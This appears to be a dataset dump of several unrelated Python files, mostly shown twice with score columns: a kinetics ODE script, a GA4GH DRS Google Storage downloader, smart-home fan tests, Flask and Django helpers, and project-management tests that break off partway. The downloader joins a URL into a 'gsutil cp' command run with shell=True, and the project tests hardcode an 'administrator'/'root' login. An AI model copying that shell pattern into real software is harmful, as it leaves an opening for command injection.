dAmdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k1*Am*Pt + km1*Ptm*A
dAdt = -k6*phi_C*S_etoile*A + k7*Sp*Am + k1*Am*Pt - km1*Ptm*A
dPtdt = -k1*Am*Pt + km1*Ptm*A + 2*k3*(PtH**2) - 2*km3*H2*(Pt**2)
dPtmdt = k1*Am*Pt - km1*Ptm*A - k2*Ptm*Hp + km2*PtH
dHpdt = km2*PtH - k2*Ptm*Hp
dH2dt = k3*(PtH**2) - km3*H2*(Pt**2)
dPtHdt = k2*Ptm*Hp - km2*PtH - 2*k3*(PtH**2) + 2*km3*H2*(Pt**2)
dS_etoiledt = Iabs*phi_T*S - k5*S_etoile - k6*phi_C*S_etoile*A
dSpdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k8*Sp*D
dSdt = -Iabs*phi_T*S + k5*S_etoile + k7*Sp*Am + k8*Sp*D
dDdt = -k8*Sp*D
return [dAmdt, dAdt, dPtdt, dPtmdt, dHpdt, dH2dt, dPtHdt, dS_etoiledt, dSpdt, dSdt, dDdt]
# conditions initiales
Am0 = 0
A0 = 10**(-3) # varie
Pt0 = 10**(-5) # varie
Ptm0 = 0
Hp0 = 10**(-5)
H20 = 0
PtH0 = 0
S_etoile0 = 0
Sp0 = 0
S0 = 10**(-4)
D0 = 10**(-2)
Z0 = [Am0, A0, Pt0, Ptm0, Hp0, H20, PtH0, S_etoile0, Sp0, S0, D0]
# plage de temps calculée ( t_min, t_max, nb_de_points_calculés )
t = numpy.linspace(0, 2*10**8, 100000)
# équivalent à t = numpy.logspace(1, 8, num=100000) pour avoir directement en échelle log
# ODE
soln = odeint(sys_cinetique, Z0, t, rtol=1.49012*10**(-15), atol=1.49012*10**(-15), mxstep=5000000)
# graphes concentration en fonction du temps
plt.figure(1) # utile si on veut plusieurs figures
plt.subplot(221) # figure 1 est divisée en 4 graphes (2*2), ici le N°1
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.title('Evolution de [A-]')
#plt.legend() pas nécessaire ici car une seule courbe par graphe
#plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(222)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.title('Evolution de [H2]')
#plt.legend()
#plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(223)
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
plt.title('Evolution de [PtH]')
#plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(224)
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution de [Pt]')
#plt.legend()
plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.figure(2)
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
#plt.plot(t,soln[:,3],color='orange', linestyle='solid', label='Pt-')
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution du système')
plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.show()
#plt.savefig('test.png') | 0.376852 | 0.485295 |
import os
import re
import requests
import subprocess
from ga4gh.drs.exceptions.drs_exceptions import DownloadSubmethodException
from ga4gh.drs.util.method_types.method_type import DownloadSubmethod
from ga4gh.drs.util.method_types.method_type import MethodType
class GS(MethodType):
"""Download DRS object bytes according to Google Storage (gs) url scheme
Attributes:
download_submethods (list): multiple methods to attempt byte download
"""
def __init__(self, json, drs_obj):
"""Instantiates a GS object
Arguments:
json (dict): parsed AccessMethod JSON, used to set other attributes
drs_obj (DRSObject): reference to parent DRSObject object
"""
super(GS, self).__init__(json, drs_obj)
self.download_submethods = [
self.__download_by_https,
self.__download_by_gsutil
]
def __convert_gs_to_https(self):
"""Convert a gs formatted URL to https
Returns:
(str): https-formatted url, references a Google Storage object
"""
gs_url = self.access_url.get_url()
sub_from = "^gs://"
sub_to = "https://storage.googleapis.com/"
new_url = re.sub(sub_from, sub_to, gs_url)
return new_url
@DownloadSubmethod()
def __download_by_https(self, write_config):
"""Download submethod, get object bytes by https
Arguments:
write_config (dict): config to write downloaded file
"""
# convert the gs url to https, and attempt to download it via
# GET request
https_url = self.__convert_gs_to_https()
self._MethodType__download_by_requests_package(https_url, write_config)
@DownloadSubmethod()
def __download_by_gsutil(self, write_config):
"""Download submethod, get object bytes by gsutil cli tool
Arguments:
write_config (dict): config to write downloaded file
"""
def iterator_func(chunk_size=8192):
"""Iterator function for chunked writing of output file
Arguments:
chunk_size (int): download chunk size in bytes
"""
# create a subprocess based on gsutil command-line tool
# as stdout is output is chunks, yield this to outer loop
# poll for status at end of stdout stream, set status
# according to exit code
url = self.access_url.get_url()
cmd = "gsutil cp " + url + " -"
task = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
file_not_complete = True
while file_not_complete:
chunk = task.stdout.read(chunk_size)
if chunk:
yield chunk
else:
file_not_complete = False
task.poll()
if task.returncode != 0:
raise DownloadSubmethodException(
write_config["opath"] + ": exception when downloading "
+ "by gsutil: " + str(task.stderr.read()))
self.download_write_stream(iterator_func, write_config) | ga4gh/drs/util/method_types/gs.py | import os
import re
import requests
import subprocess
from ga4gh.drs.exceptions.drs_exceptions import DownloadSubmethodException
from ga4gh.drs.util.method_types.method_type import DownloadSubmethod
from ga4gh.drs.util.method_types.method_type import MethodType
class GS(MethodType):
"""Download DRS object bytes according to Google Storage (gs) url scheme
Attributes:
download_submethods (list): multiple methods to attempt byte download
"""
def __init__(self, json, drs_obj):
"""Instantiates a GS object
Arguments:
json (dict): parsed AccessMethod JSON, used to set other attributes
drs_obj (DRSObject): reference to parent DRSObject object
"""
super(GS, self).__init__(json, drs_obj)
self.download_submethods = [
self.__download_by_https,
self.__download_by_gsutil
]
def __convert_gs_to_https(self):
"""Convert a gs formatted URL to https
Returns:
(str): https-formatted url, references a Google Storage object
"""
gs_url = self.access_url.get_url()
sub_from = "^gs://"
sub_to = "https://storage.googleapis.com/"
new_url = re.sub(sub_from, sub_to, gs_url)
return new_url
@DownloadSubmethod()
def __download_by_https(self, write_config):
"""Download submethod, get object bytes by https
Arguments:
write_config (dict): config to write downloaded file
"""
# convert the gs url to https, and attempt to download it via
# GET request
https_url = self.__convert_gs_to_https()
self._MethodType__download_by_requests_package(https_url, write_config)
@DownloadSubmethod()
def __download_by_gsutil(self, write_config):
"""Download submethod, get object bytes by gsutil cli tool
Arguments:
write_config (dict): config to write downloaded file
"""
def iterator_func(chunk_size=8192):
"""Iterator function for chunked writing of output file
Arguments:
chunk_size (int): download chunk size in bytes
"""
# create a subprocess based on gsutil command-line tool
# as stdout is output is chunks, yield this to outer loop
# poll for status at end of stdout stream, set status
# according to exit code
url = self.access_url.get_url()
cmd = "gsutil cp " + url + " -"
task = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
file_not_complete = True
while file_not_complete:
chunk = task.stdout.read(chunk_size)
if chunk:
yield chunk
else:
file_not_complete = False
task.poll()
if task.returncode != 0:
raise DownloadSubmethodException(
write_config["opath"] + ": exception when downloading "
+ "by gsutil: " + str(task.stderr.read()))
self.download_write_stream(iterator_func, write_config) | 0.635109 | 0.244397 |
import asyncio
from datetime import timedelta
from unittest.mock import patch
from bond_api import BPUPSubscriptions, DeviceType
from openpeerpower import core
from openpeerpower.components import fan
from openpeerpower.components.fan import DOMAIN as FAN_DOMAIN
from openpeerpower.const import EVENT_OPENPEERPOWER_STOP, STATE_ON, STATE_UNAVAILABLE
from openpeerpower.core import CoreState
from openpeerpower.util import utcnow
from .common import patch_bond_device_state, setup_platform
from tests.common import async_fire_time_changed
def ceiling_fan(name: str):
"""Create a ceiling fan with given name."""
return {
"name": name,
"type": DeviceType.CEILING_FAN,
"actions": ["SetSpeed", "SetDirection"],
}
async def test_bpup_goes_offline_and_recovers_same_entity(opp: core.OpenPeerPower):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for the entity and
we do not fallback to polling because state is in sync.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
# Ensure we do not poll to get the state
# since bpup has recovered and we know we
# are back in sync
with patch_bond_device_state(side_effect=Exception):
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 66
async def test_bpup_goes_offline_and_recovers_different_entity(
opp: core.OpenPeerPower,
):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for a different entity which
forces a poll since we need to re-get the state.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
bpup_subs.notify(
{
"s": 200,
"t": "bond/not-this-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=430))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_fails_and_recovers(opp: core.OpenPeerPower):
"""Test that polling fails and we recover."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_stops_at_the_stop_event(opp: core.OpenPeerPower):
"""Test that polling stops at the stop event."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
opp.bus.async_fire(EVENT_OPENPEERPOWER_STOP)
opp.state = CoreState.stopping
await opp.async_block_till_done()
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE | tests/components/bond/test_entity.py | import asyncio
from datetime import timedelta
from unittest.mock import patch
from bond_api import BPUPSubscriptions, DeviceType
from openpeerpower import core
from openpeerpower.components import fan
from openpeerpower.components.fan import DOMAIN as FAN_DOMAIN
from openpeerpower.const import EVENT_OPENPEERPOWER_STOP, STATE_ON, STATE_UNAVAILABLE
from openpeerpower.core import CoreState
from openpeerpower.util import utcnow
from .common import patch_bond_device_state, setup_platform
from tests.common import async_fire_time_changed
def ceiling_fan(name: str):
"""Create a ceiling fan with given name."""
return {
"name": name,
"type": DeviceType.CEILING_FAN,
"actions": ["SetSpeed", "SetDirection"],
}
async def test_bpup_goes_offline_and_recovers_same_entity(opp: core.OpenPeerPower):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for the entity and
we do not fallback to polling because state is in sync.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
# Ensure we do not poll to get the state
# since bpup has recovered and we know we
# are back in sync
with patch_bond_device_state(side_effect=Exception):
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 66
async def test_bpup_goes_offline_and_recovers_different_entity(
opp: core.OpenPeerPower,
):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for a different entity which
forces a poll since we need to re-get the state.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
bpup_subs.notify(
{
"s": 200,
"t": "bond/not-this-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=430))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_fails_and_recovers(opp: core.OpenPeerPower):
"""Test that polling fails and we recover."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_stops_at_the_stop_event(opp: core.OpenPeerPower):
"""Test that polling stops at the stop event."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
opp.bus.async_fire(EVENT_OPENPEERPOWER_STOP)
opp.state = CoreState.stopping
await opp.async_block_till_done()
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE | 0.78016 | 0.41561 |
class ServiceDebugger(object):
__enable_debug = True
@classmethod
def set_debug(cls, enable=True):
cls.__enable_debug = enable
@classmethod
def debug(cls, show_form=True, show_param=True, show_response=True, count_time=True, content_limit=100, disable=False):
from flask import request
from functools import wraps
from datetime import datetime
import traceback
if not cls.__enable_debug:
def empty_wrapper(func):
return func
return empty_wrapper
def make_wrapper(func):
@wraps(func)
def wrapper(**kwargs):
if not disable:
print("-" * 10)
print("Service:{}".format(func.__name__))
if show_param:
print("Param:")
for name in kwargs:
val = kwargs[name]
print("\t{0}: {1}".format(name, val))
if show_form:
print("FormData:")
for name in request.form:
print("\t{0}: {1}".format(name, str(request.form.get(name))[:content_limit]))
if count_time:
start_time = datetime.now()
print("StartTime:{}".format(start_time))
try:
resp = func(**kwargs)
except:
print(traceback.format_exc())
resp = ""
traceback.print_exc()
if not disable:
if count_time:
end_time = datetime.now()
print("EndTime:{}".format(end_time))
print("TimeCost:{}".format(end_time - start_time))
if show_response:
print("Return:" + resp[:content_limit])
return resp
return wrapper
return make_wrapper | FactorKeeper/Util/ServiceUtil/Debug.py | class ServiceDebugger(object):
__enable_debug = True
@classmethod
def set_debug(cls, enable=True):
cls.__enable_debug = enable
@classmethod
def debug(cls, show_form=True, show_param=True, show_response=True, count_time=True, content_limit=100, disable=False):
from flask import request
from functools import wraps
from datetime import datetime
import traceback
if not cls.__enable_debug:
def empty_wrapper(func):
return func
return empty_wrapper
def make_wrapper(func):
@wraps(func)
def wrapper(**kwargs):
if not disable:
print("-" * 10)
print("Service:{}".format(func.__name__))
if show_param:
print("Param:")
for name in kwargs:
val = kwargs[name]
print("\t{0}: {1}".format(name, val))
if show_form:
print("FormData:")
for name in request.form:
print("\t{0}: {1}".format(name, str(request.form.get(name))[:content_limit]))
if count_time:
start_time = datetime.now()
print("StartTime:{}".format(start_time))
try:
resp = func(**kwargs)
except:
print(traceback.format_exc())
resp = ""
traceback.print_exc()
if not disable:
if count_time:
end_time = datetime.now()
print("EndTime:{}".format(end_time))
print("TimeCost:{}".format(end_time - start_time))
if show_response:
print("Return:" + resp[:content_limit])
return resp
return wrapper
return make_wrapper | 0.359027 | 0.07658 |
from typing import Generator
from ..models import (
ClassRoom, Subject,
Teacher, Student, Group, Service,
Source, EventLocation,
)
from django import forms
from functools import partial
DateInput = partial(
forms.DateInput,
{'class': 'datepicker datepicker_now form-control'}
)
DateInputEmpty = partial(
forms.DateInput,
{'class': 'datepicker form-control'}
)
DateTimeInput = partial(
forms.DateTimeInput,
{'class': 'datepicker form-control'}
)
METHOD_DELETE = 'delete'
METHOD_EDIT = 'edit'
AVAILABLE_METHODS = [
METHOD_DELETE,
METHOD_EDIT,
]
def _prepare_choices(objects: list) -> list:
res = []
for o in objects:
res.append((o.id, str(o)))
return res
def get_classrooms() -> list:
cl_r = ClassRoom.objects.all()
res = []
for room in cl_r:
res.append((room.id, str(room)))
return res
def get_event_locations() -> list:
locations = EventLocation.objects.all()
return _prepare_choices(locations)
def get_subjects() -> list:
iter_ = Subject.objects.filter(status=Subject.Status.ACTIVE).all()
res = []
for i in iter_:
res.append((i.id, str(i.name)))
return res
def get_subjects_dummy() -> Generator:
yield '', ''
def get_teachers() -> list:
iter_ = Teacher.objects.filter(status=Teacher.Status.ACTIVE).all()
res = []
for i in iter_:
if i.subjects:
res.append((i.id, str(i)))
return res
def get_students() -> list:
iter_ = Student.objects.filter(status=Student.Status.ACTIVE).all()
return _prepare_choices(iter_)
def get_free_source_students() -> list:
iter_ = Student.objects.filter(
source=None,
).all()
return _prepare_choices(iter_)
def get_groups() -> list:
iter_ = Group.objects.all()
res = []
for i in iter_:
if i.students:
res.append((i.id, str(i)))
return res
def get_services() -> Generator:
res = Service.objects.all().values('id', 'name')
for row in res:
yield row['id'], row['name']
def get_service_type_of() -> list:
return Service.TypeOf.choices
def get_sources() -> Generator:
res = Source.objects.all().values('id', 'name')
for r in res:
yield r['id'], r['name']
def get_classrooms_types() -> list:
return ClassRoom.RoomType.choices | day_ok/schedule/forms/utils.py | from typing import Generator
from ..models import (
ClassRoom, Subject,
Teacher, Student, Group, Service,
Source, EventLocation,
)
from django import forms
from functools import partial
DateInput = partial(
forms.DateInput,
{'class': 'datepicker datepicker_now form-control'}
)
DateInputEmpty = partial(
forms.DateInput,
{'class': 'datepicker form-control'}
)
DateTimeInput = partial(
forms.DateTimeInput,
{'class': 'datepicker form-control'}
)
METHOD_DELETE = 'delete'
METHOD_EDIT = 'edit'
AVAILABLE_METHODS = [
METHOD_DELETE,
METHOD_EDIT,
]
def _prepare_choices(objects: list) -> list:
res = []
for o in objects:
res.append((o.id, str(o)))
return res
def get_classrooms() -> list:
cl_r = ClassRoom.objects.all()
res = []
for room in cl_r:
res.append((room.id, str(room)))
return res
def get_event_locations() -> list:
locations = EventLocation.objects.all()
return _prepare_choices(locations)
def get_subjects() -> list:
iter_ = Subject.objects.filter(status=Subject.Status.ACTIVE).all()
res = []
for i in iter_:
res.append((i.id, str(i.name)))
return res
def get_subjects_dummy() -> Generator:
yield '', ''
def get_teachers() -> list:
iter_ = Teacher.objects.filter(status=Teacher.Status.ACTIVE).all()
res = []
for i in iter_:
if i.subjects:
res.append((i.id, str(i)))
return res
def get_students() -> list:
iter_ = Student.objects.filter(status=Student.Status.ACTIVE).all()
return _prepare_choices(iter_)
def get_free_source_students() -> list:
iter_ = Student.objects.filter(
source=None,
).all()
return _prepare_choices(iter_)
def get_groups() -> list:
iter_ = Group.objects.all()
res = []
for i in iter_:
if i.students:
res.append((i.id, str(i)))
return res
def get_services() -> Generator:
res = Service.objects.all().values('id', 'name')
for row in res:
yield row['id'], row['name']
def get_service_type_of() -> list:
return Service.TypeOf.choices
def get_sources() -> Generator:
res = Source.objects.all().values('id', 'name')
for r in res:
yield r['id'], r['name']
def get_classrooms_types() -> list:
return ClassRoom.RoomType.choices | 0.507324 | 0.120646 |
import random
import string
from model.manage_projects_m import Project
def test_create_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Создаём проект
app.manage_projects.create_project(project)
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Добавляем к старому списку новый проект
old_list.append(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_delete_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
if len(app.manage_projects.get_projects_list()) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Убираем из старого списка удалённый проект
old_list.remove(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_create_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
parced_old_list = soap_projects_list(app, password, username)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Создаём проект
app.manage_projects.create_project(project)
parced_new_list = soap_projects_list(app, password, username)
parced_old_list.append(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def test_delete_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
parced_old_list = soap_projects_list(app, password, username)
# Проверяем, есть ли проекты вообще. Добавляем при необходимости
if len(parced_old_list) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
parced_old_list = soap_projects_list(app, password, username)
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
parced_new_list = soap_projects_list(app, password, username)
# Убираем из старого списка удалённый проект
parced_old_list.remove(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def soap_projects_list(app, password, username):
# Получаем список проектов
unparsed_list = app.soap.get_projects_list(username, password)
assert unparsed_list
parced_old_list = app.manage_projects.get_projects_list_from_soap(unparsed_list)
assert parced_old_list
return parced_old_list | test/test_manage_projects.py | import random
import string
from model.manage_projects_m import Project
def test_create_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Создаём проект
app.manage_projects.create_project(project)
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Добавляем к старому списку новый проект
old_list.append(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_delete_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
if len(app.manage_projects.get_projects_list()) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Убираем из старого списка удалённый проект
old_list.remove(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_create_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
parced_old_list = soap_projects_list(app, password, username)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Создаём проект
app.manage_projects.create_project(project)
parced_new_list = soap_projects_list(app, password, username)
parced_old_list.append(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def test_delete_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
parced_old_list = soap_projects_list(app, password, username)
# Проверяем, есть ли проекты вообще. Добавляем при необходимости
if len(parced_old_list) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
parced_old_list = soap_projects_list(app, password, username)
# Удаляем первый по списку проект
